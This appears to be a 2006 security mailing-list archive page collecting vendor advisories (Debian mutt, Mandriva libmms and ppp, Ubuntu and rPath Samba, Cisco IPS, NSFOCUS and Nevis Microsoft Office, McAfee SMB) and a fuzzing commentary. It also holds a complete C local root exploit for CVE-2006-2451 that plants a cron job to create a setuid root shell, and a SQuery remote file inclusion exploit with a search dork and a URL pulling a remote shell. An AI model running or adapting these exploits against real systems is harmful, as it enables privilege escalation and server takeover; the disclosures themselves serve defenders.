6dded70d1b853282f90168f83a3da833 http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2.diff.gz Size/MD5 checksum:94233 7c72a620b8772515556b986bfb93b0fb http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9.orig.tar.gz Size/MD5 checksum: 3033253 587dd1d8f44361b73b82ef64eb30c3a0 Alpha architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_alpha.deb Size/MD5 checksum: 1530480 f93c6b6e3d599a00d8927cc67c1ce691 AMD64 architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_amd64.deb Size/MD5 checksum: 1442518 aeb593803115ca292f2112fbf44106fc ARM architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_arm.deb Size/MD5 checksum: 1420526 569e402f7715c2116d0445dedd8a419f Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_i386.deb Size/MD5 checksum: 1416838 e38785e2498fca52d8a7bbefae26fa94 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_ia64.deb Size/MD5 checksum: 1626542 2aa9e0061439f25598ce205ef680acc1 HP Precision architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_hppa.deb Size/MD5 checksum: 1467244 5731fe300b59d268423108e5073c29ac Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_m68k.deb Size/MD5 checksum: 1370346 a9acf01e90144e69d06f5ab94984e3fa Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_mips.deb Size/MD5 checksum: 1474126 ed6c9bd33b9f3173dac03c9bc8da120a Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_mipsel.deb Size/MD5 checksum: 1472642 b1693682bf38da32054e638c37b6ab56 PowerPC architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_powerpc.deb Size/MD5 checksum: 1446202 6226966d71933436a2909dfc9a9c57a8 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_s390.deb Size/MD5 checksum: 1444064 50bcd604cf4ebe69d4bd4e11c44cdb88 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_sparc.deb Size/MD5 checksum: 1417006 056963151226667c293f13c4b8a2db88 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEstAcXm3vHE4uyloRAoyjAKDJ0AHvdlXXjNl+FUq5VFzk/ZCM8wCfZ/Tr wOSRNhC+EzSkLuBEMiZmlXc= =akN4 -END PGP SIGNATURE-
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Maybe this is obvious for Paul Starzetz (as well as many other people) but full-disclosure is not really "full" without exploit code. Working exploit attached. You can also download it from: http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c Greetz to !dSR ppl :-) - -- Saludos, - -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFEtD815H+KferVZ0IRAjhKAKCtHnTCwV0D/kH3dt0HItQUPZ/JegCglaQM vO8VFJyxf+EXy2buqTK4kVM= =dzRm -END PGP SIGNATURE- /*/ /* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer<[EMAIL PROTECTED]> (main PoC code) */ /* - RoMaNSoFt <[EMAIL PROTECTED]> (local root code) */ /* [ 10.Jul.2006 ] */ /*/ #include #include #include #include #include #include #include #include char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n"); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry\n"); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i"); }
NSFOCUS SA2006-04 : Microsoft Office GIF Filter Buffer Overflow Vulnerability
NSFOCUS Security Advisory (SA2006-04) Microsoft Office GIF Filter Buffer Overflow Vulnerability Release Date: 2006-07-12 CVE ID: CVE-2006-0007 http://www.nsfocus.com/english/homepage/research/0604.htm Affected systems & software === Microsoft Office 2000 Microsoft Office XP Microsoft Office 2003 Unaffected systems & software === Summary = NSFocus Security Team discovered a buffer overflow vulnerability in Microsoft Office GIF filter, which could allow attackers to run arbitrary code via a carefully crafted GIF image. Description GIFIMP32.FLT is a GIF image filter shipped with Microsoft Office, which is installed by default in %CommonProgramFiles%\Microsoft Shared\Grphflt\GIFIMP32.FLT. GIFIMP32.FLT contains a buffer overflow vulnerability in the handling of some malformed GIF images, which allows attackers to run arbitrary code. Any application that calls GIFIMP32.FLT is affected by this vulnerability. For example, mspaint.exe will call the filter automatically when opening files in .gif format, if Microsoft Office is installed. Attackers could gain control over a system by alluring users to open a malicious GIF image. Workaround = 1. Do not open any GIF image from untrusted sources. 2. Temporarily remove GIFIMP32.FLT. Vendor Status == 2005.05.27 Informed the vendor 2005.06.02 Vendor confirmed the vulnerability 2006.07.11 Microsoft has released a security bulletin (MS06-039) and related patches. For more details about the security bulletin, please refer to: http://www.microsoft.com/technet/security/bulletin/MS06-039.mspx Additional Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-0007 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries. Acknowledgment === Yu Yang of NSFocus Security Team found the vulnerability. DISCLAIMS == THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team <[EMAIL PROTECTED]> NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com) PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
[ MDKSA-2006:117-1 ] - Updated libmms packages fix buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:117-1 http://www.mandriva.com/security/ ___ Package : libmms Date: July 12, 2006 Affected: 2006.0 ___ Problem Description: Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via the (1) send_command, (2) string_utf16, (3) get_data, and (4) get_media_packet functions, and possibly other functions. Libmms uses the same vulnerable code. Update: The previous update for libmms had an incorrect/incomplete patch. This update includes a more complete fix for the issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200 ___ Updated Packages: Mandriva Linux 2006.0: e9fd0a2b5764917cfaf2e9bf45af2e5d 2006.0/RPMS/libmms0-0.1-1.2.20060mdk.i586.rpm b556179bdc4842b0cc923346494dadce 2006.0/RPMS/libmms0-devel-0.1-1.2.20060mdk.i586.rpm a539ad416a9f9b1252fa12e5b2c29b60 2006.0/SRPMS/libmms-0.1-1.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 2a16fb87e7c00d2246f5f0716d6451eb x86_64/2006.0/RPMS/lib64mms0-0.1-1.2.20060mdk.x86_64.rpm b2775f1f51106cfdb390627a455c3c28 x86_64/2006.0/RPMS/lib64mms0-devel-0.1-1.2.20060mdk.x86_64.rpm a539ad416a9f9b1252fa12e5b2c29b60 x86_64/2006.0/SRPMS/libmms-0.1-1.2.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEtTOwmqjQ0CJFipgRAuL5AJ9bqGCwiEw5NRx9UIlaOQozMi8AZACdG3V/ 3fsWvnOjupNxWCtteJZZEb0= =lbPH -END PGP SIGNATURE-
Microsoft Excel Array Index Error Remote Code Execution
Microsoft Excel Array Index Error Remote Code Execution By Sowhat of Nevis Labs 2006.07.11 http://www.nevisnetworks.com http://secway.org/advisory/AD20060711.txt Vendor Microsoft Inc. Products affected: Microsoft Office 2000 Service Pack 3 Microsoft Office XP Service Pack 3 Microsoft Office 2003 Service Pack 1 or Service Pack 2 maybe some others Remote: YES Exploitable: YES CVE: CVE-2006-1306 Overview: This vulnerability allows remote attackers to execute arbitrary code in the context of the logged in user. An array boundary condition may be violated by a malicious .xls file in order to redirect execution into attacker-supplied data. Exploitation requires that the attacker coerce or persuade the victim to open a malicious .XLS file. Details: The specific flaw exists within the parsing of the BIFF file format used by Microsoft Excel. A function pointer is not validated and insecurely affected by some user supplied data, thus resulting code execution. The disassembly code: .text:300ABAFC sub_300ABAFCproc near ; CODE XREF: sub_3008FEA4+B5p .text:300ABAFC ; sub_30096EC8-5F2p ... .text:300ABAFC .text:300ABAFC arg_0 = dword ptr 4 .text:300ABAFC arg_4 = dword ptr 8 .text:300ABAFC arg_8 = dword ptr 0Ch .text:300ABAFC .text:300ABAFC mov eax, [esp+arg_0] .text:300ABB00 movsx ecx, word ptr [eax] --> [eax] read from the XLS file .text:300ABB03 push[esp+arg_8] .text:300ABB07 imulecx, 14h .text:300ABB0A push[esp+4+arg_4] .text:300ABB0E pusheax .text:300ABB0F mov eax, dword_308792C4 --> [eax]=00e17638,always, maybe different in the language SYSTEM .text:300ABB14 calldword ptr [ecx+eax] --> Here! call your CODE. .text:300ABB17 retn0Ch .text:300ABB17 sub_300ABAFCendp eax is the index and always set to 00e17638h(?), and the ecx can vary from a very wide range, so we the attacker can plant specific data somewhere and CALL it. The supplied data will be used to some operate and after some caculate (such as imul) will be used for direct memory access, in this case, we can caculate and specially choose some value which contains data we can control, will easily lead to remote code execution. POC: No POC will be supplied Fix: Microsoft has released an update for Microsoft Office which is set to address this issue. This can be downloaded from: http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx Vendor Response: 2006.05.30 Vendor notified via [EMAIL PROTECTED] 2006.05.30 Vendor responded 2006.07.11 Vendor released MS06-037 patch 2006.07.11 Advisory released Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2006-1306 Reference: 1. http://sc.openoffice.org/excelfileformat.pdf 2. http://www.microsoft.com/technet/security/Bulletin/MS06-037.mspx 3. http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx 4. http://www.eeye.com/html/research/advisories/AD20051104.html Greetings to [EMAIL PROTECTED] :) -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?"
SMB Information Disclosure Vulnerability
___ McAfee, Inc. McAfee® Avert® Labs Security Advisory Public Release Date: 2006-07-11 SMB Information Disclosure Vulnerability CVE-2006-1315 ___ Synopsis An information disclosure vulnerability exists in the Server service that could allow an attacker to retrieve fragments of memory from an affected host via the hosts SMB server. ___ Vulnerable System or Application Microsoft Windows 2000 Microsoft Windows XP w/ Service Pack 1 Microsoft Windows XP w/ Service Pack 2 Microsoft Windows Server 2003 Microsoft Windows Server 2003 w/ Service Pack 1 ___ Vulnerability Information This issue is caused by the Server protocol drivers failure to zero out memory before reusing it when constructing SMB response messages. An attacker could exploit this vulnerability by sending a specially crafted request that when processed would result in a response packet being sent that unintentionally contained portions of memory from the target host. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly. It could be used to produce useful information to try to further compromise the affected system. ___ Resolution Microsoft has released a security bulletin and associated patch for this vulnerability: http://www.microsoft.com/technet/security/Bulletin/MS06-035.mspx ___ Credits This vulnerability was discovered by Mike Price and Rafal Wojtczuk of McAfee Avert Labs. ___ Legal Notice Copyright (C) 2006 McAfee, Inc. The information contained within this advisory is provided for the convenience of McAfees customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes. McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.
Fuzzing Microsoft Office
Last friday I have posted a POC regarding the microsoft office mso.dll boundary condition error, i have checked the code flow of mso_203 and it was producing access violation errors which i have sent to bugtraq and FD , microsoft's MSRC blog has been updated at http://blogs.technet.com/msrc/archive/2006/07/10/441006.aspx stating that the vulnerability is not remotely exploitable , that is true. However while checking a bunch of fuzzed documents several other problems have been noticed, even other people have reported the issues with different office applications. Some of them were able to reproduce the issue and they are exploitable others may not be. Microsoft Office vulnerabilities are not new but recently interest is increased , it has been noticed that people fuzzing the documents and afterwards they don't know which type of error it is or whether the vulnerability is exploitable or not !!. Just note how many 0-days have been reported in the past few months in MS Office products. It is interesting to see that most of these vulnerabilities are directly or indirectly related to fuzzing and or changing the normal behavior of documents. If we take the example of this recently discovered HLINK.DLL buffer overflow flaw , the kcope who reported it used the Perl's Excel worksheet generator to generate a long URL string in the worksheet, interestingly Microsoft Office does not allow you to generate the hyperlinks with such long strings (usually restricted to 256 bytes) , even the OLE automation restricts you but the Microsoft's binary file format does not have such restrictions for "hyperlink" objects, maybe it was assumed that library is safe since office is not allowing the users to have such nasty url's. The problem of generating the specially crafted files is not a big issue, it was assumed that one should know the binary file format in order to generate some "valid document" (one which is parsable by the applications), but the Perl's library is just an example, nanika posted another style sheet flaw in ms excel which looks like the result of an exercise with same library. Few days back the same exploit was released for MS Word , it is also interesting that 3rd party libraries are not that much restrictive when producing the MS Office compatible files, they allow you to do some really funny stuff. For example it is an open question that why OpenOffice developer's decided to accept a url string of say 20,000 bytes (perhaps of indefinite length) ?? One can easily identify some new problems while experimenting this stuff. - Naveed Afzal
rPSA-2006-0128-1 samba samba-swat
rPath Security Advisory: 2006-0128-1 Published: 2006-07-11 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: samba=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1 samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403 https://issues.rpath.com/browse/RPL-496 Description: In previous versions of the samba package, a remote attacker can cause samba to consume all system memory, leading to a denial of service.
Cisco Security Advisory: Cisco Intrusion Prevention System Malformed Packet Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Intrusion Prevention System Malformed Packet Denial of Service Advisory ID: cisco-sa-20060712-ips http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml Revision 1.0 For Public Release 2006 July 12 1600 UTC (GMT) - - Contents Summary Affected Products Details Impact Software Version and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of this Notice: FINAL Distribution Revision History Cisco Security Procedures - - Summary === Cisco Intrusion Prevention System (IPS) software version 5.1 is vulnerable to a denial of service condition caused by a malformed packet, which may result in an IPS device becoming inaccessible remotely or via the console and fail to process packets. A power reset is required to recover the IPS device. There are no workarounds for this vulnerability. Cisco has made free software available to address this vulnerability for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml Affected Products = Vulnerable Products +-- Cisco Intrusion Prevention System 42xx appliances running IPS software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d), 5.1(1e) or 5.1(p1). IPS software versions 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d) and 5.1(1e) are repackaged versions of 5.1(1) created to fix various installation problems. All 5.1(1) patch versions report 5.1(1) as the installed version. Note: Some IDS/IPS appliances shipped before IPS software version 5.0 was available and have model numbers starting with IDS, not IPS. The following 42xx appliances are potentially affected. * IDS-4235 * IPS-4240 * IDS-4250-SX * IDS-4250-TX * IDS-4250-XL (4250 with XL accelerator card) * IPS-4255 Products Confirmed Not Vulnerable + All devices running Cisco Intrusion Detection Systems (IDS) software versions 4.x or IPS versions 5.0(x). Additionally, the following devices are not vulnerable even if running IPS software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1 (1d), 5.1(1e) or 5.1(1p1). * NM-CIDS * IDSM-2 * ASA-SSM-AIP-10 * ASA-SSM-AIP-20 * IDS-4210 * IDS-4215 The following devices do not support IPS software version 5.1 and are not vulnerable. * IDS-4220 * IDS-4230 To determine the version of software running an IPS device, log into the IPS device using an SSH client and issue the command show version. sensor#show version Application Partition: Cisco Intrusion Prevention System, Version 5.1(1p1)S215.0 Details === Cisco Intrusion Prevention Systems (IPS) are a family of network security devices that provide network based threat prevention services. A vulnerability exists in the custom device driver for Intel-based gigabit network adapters used to process packets received by the sensing interfaces of certain IPS devices. A malformed IP packet received on an Intel-based gigabit network adapter configured for use as a sensing interface may result in the IPS device experiencing a kernel panic. Affected IPS devices will cease processing packets, producing alerts, performing automated actions such as logging, and become inaccessible remotely or via the console. If deployed as an inline device, the IPS will also stop forwarding packets between interfaces and may cause a network outage. IPS devices configured to use the auto-bypass feature will also fail to forward packets. Attackers may use this vulnerability to disable an IPS device to hide malicious activity. This vulnerability only affects certain IPS devices configured to use Intel-based gigabit network adapters as sensing interfaces. IPS devices configured to use an Intel-based gigabit network adapter as a management interface are not affected by this vulnerability. A power reset is required to recover the IPS device. This vulnerability is documented in Cisco bug ID CSCsd36590 ( registered customers only) . Impact == Successful exploitation of the vulnerability may result in the failure of an IPS device to operate as expected. Affected devices will become inaccessible remotely or via the console and stop processing packets. If deployed as an inline device, an IPS device will stop forwarding packets, including devices configured to use the auto-bypass feature. This may result in a network outage. A power reset is required to recover the IPS device. Software Version and Fixes == When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to
[USN-314-1] samba vulnerability
=== Ubuntu Security Notice USN-314-1 July 12, 2006 samba vulnerability CVE-2006-3403 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: samba3.0.10-1ubuntu3.1 Ubuntu 5.10: samba3.0.14a-6ubuntu1.1 Ubuntu 6.06 LTS: samba3.0.22-1ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: The Samba security team reported a Denial of Service vulnerability in the handling of information about active connections. In certain circumstances an attacker could continually increase the memory usage of the smbd process by issuing a large number of share connection requests. By draining all available memory, this could be exploited to render the remote Samba server unusable. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1.diff.gz Size/MD5: 107580 f41e99280b44e47c1e1a0c86a56c66de http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1.dsc Size/MD5: 978 d516ac96d66dbda1388e861ec8220ee7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10.orig.tar.gz Size/MD5: 15176926 b19fd86d3c11a1b43f75a5988cd9ceeb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.0.10-1ubuntu3.1_all.deb Size/MD5: 11676712 55beda5b448bd6ef999d76a8e75ad3aa amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/s/samba/libpam-smbpass_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 372670 7e7a00d1458113ae03ab9ceef1c33f92 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 780744 a9e481451b19277676fe825118b6097b http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 590090 8d76d3c3b1215b421a09ad40714ae533 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 5070312 35dfb5c2e732296d16c242af7d1386e7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 2150094 835196ef9aeac4f16356522cb2d6b493 http://security.ubuntu.com/ubuntu/pool/universe/s/samba/samba-dbg_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 6390788 5b4cb573a5813c12dbca92895612306e http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 2733990 311b65f9c3d9bcfbae6cf527a7101081 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 2813560 a5fdc57b8c3f39a1599685971196cb1f http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 403878 39ed8078277f923e533f01c62d96981a http://security.ubuntu.com/ubuntu/pool/universe/s/samba/swat_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 4062114 94d4663ac08126eae60227429a8e1143 http://security.ubuntu.com/ubuntu/pool/universe/s/samba/winbind_3.0.10-1ubuntu3.1_amd64.deb Size/MD5: 1623058 83d1e2d9b57331a14d50d1a5fd231aff i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/s/samba/libpam-smbpass_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 329214 0a57f5b7ec5c9d426a1a5d0306a0ee72 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 704546 84d98ae1dd41a8161ad8ea097dbc8a4e http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 523310 59e49f6c871b85bf6cb04ee4b264bd39 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 4464594 10ded0e61a32f344633d25eb5c6f55a3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 1887970 19f0177cbc0cbcdc795c6fb742512152 http://security.ubuntu.com/ubuntu/pool/universe/s/samba/samba-dbg_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 6543900 7920120df8ae6d539965c199c07d1604 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 2355884 d309130e0783d153dc891a9a6a5ecaf3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.10-1ubuntu3.1_i386.deb Size/MD5: 2394052 5aa3665da0c4e601c98bceae300d6873 http://security.ubuntu.com/ubuntu/pool/main/s/sa
Re: [ANNOUNCEMENT] Samba 3.0.1 - 3.0.22: memory exhaustion DoS against smbd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Gerald (Jerry) Carter wrote: > == > == > == Subject: Memory exhaustion DoS against smbd > == CVE ID#: CAN-2006-1059 ^^ > == > == Versions:Samba Samba 3.0.1 - 3.0.22 (inclusive) > == > == Summary: smbd may allow internal structures > == maintaining state for share connections > == to grow unbounded. > == > == This is a cut-n-paste error. The correct CVE # is CVE-2006-3403. Sorry for any confusion. It has been updated on the web site as well. All other information is correct. cheers, jerry = Samba--- http://www.samba.org Centeris --- http://www.centeris.com "What man is a man who does not make the world better?" --Balian -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org iD8DBQFEsucaIR7qMdg1EfYRAiQgAKC/hRB8FFMkKYTUD3P3qSLAxXAo/wCg7n+j 6z+13jxmSlgZaA9WKenkMB0= =W8Nz -END PGP SIGNATURE-
SQuery <= 4.5(libpath) Remote File Inclusion Exploit
= =SQuery <= 4.5(libpath) Remote File Inclusion Exploit | | | = =Worked On : ALL VERSIONS | | =Critical Level : Dangerous | | =Gug Found In : gore.php | = = Dork : "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery" | | | = http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM? | | ===| =Discoverd By : SHiKaA =Conatact : SHiKaA-[at]hotmail.com GreetZ : BlAcK_BiRd Kambaa NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
Re: ATutor 1.5.3 Cross Site Scripting
The XXS issues have been patched and will be available in the coming maintenance release (1.5.3_pl1) The mentioned SQL injection vulnerability is not possible. Please remove it.
[ MDKA-2006:119 ] - Updated ppp packages fix plugin vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKA-2006:119 http://www.mandriva.com/security/ ___ Package : ppp Date: July 10, 2006 Affected: 2006.0 ___ Problem Description: Marcus Meissner discovered that pppd's winbind plugin did not check for the result of the setuid() call which could allow an attacker to exploit this on systems with certain PAM limits enabled to execute the NTLM authentication helper as root. This could possibly lead to privilege escalation dependant upon the local winbind configuration. Updated packages have been patched ot correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2194 ___ Updated Packages: Mandriva Linux 2006.0: 75455046d94e92441bbe2e0e2b773082 2006.0/RPMS/ppp-2.4.3-9.1.20060mdk.i586.rpm f567cca02725deb575a8f13452234664 2006.0/RPMS/ppp-devel-2.4.3-9.1.20060mdk.i586.rpm 8872f55ecea3ba6e001c4bca4972199e 2006.0/RPMS/ppp-dhcp-2.4.3-9.1.20060mdk.i586.rpm a741c885635d908b200a1bf60232b71f 2006.0/RPMS/ppp-pppoatm-2.4.3-9.1.20060mdk.i586.rpm 058a637fd471f0a4f2791fbbfe2f763b 2006.0/RPMS/ppp-pppoe-2.4.3-9.1.20060mdk.i586.rpm 3e0a3e901f9cab4fa879fec18fb6ac92 2006.0/RPMS/ppp-prompt-2.4.3-9.1.20060mdk.i586.rpm b2ed30cae68e544fc63c794742577f1a 2006.0/RPMS/ppp-radius-2.4.3-9.1.20060mdk.i586.rpm 2578865b6af5300d3027aa62eaa1466b 2006.0/SRPMS/ppp-2.4.3-9.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: b00f91f85a11f75dfb3a038a15fee3e5 x86_64/2006.0/RPMS/ppp-2.4.3-9.1.20060mdk.x86_64.rpm 63c00cf07b9b2729e4820fb270372800 x86_64/2006.0/RPMS/ppp-devel-2.4.3-9.1.20060mdk.x86_64.rpm 90fe962badb7773bc747b2a595c42e2e x86_64/2006.0/RPMS/ppp-dhcp-2.4.3-9.1.20060mdk.x86_64.rpm 24074e562bef8364308931f71cd66644 x86_64/2006.0/RPMS/ppp-pppoatm-2.4.3-9.1.20060mdk.x86_64.rpm cf3ec260bf90e2b086fa02d4267bc5c2 x86_64/2006.0/RPMS/ppp-pppoe-2.4.3-9.1.20060mdk.x86_64.rpm 5455b8bd4daf610893ff36031ead5167 x86_64/2006.0/RPMS/ppp-prompt-2.4.3-9.1.20060mdk.x86_64.rpm 2dcb7f91af4fddeec7b83b396cd4d7f0 x86_64/2006.0/RPMS/ppp-radius-2.4.3-9.1.20060mdk.x86_64.rpm 2578865b6af5300d3027aa62eaa1466b 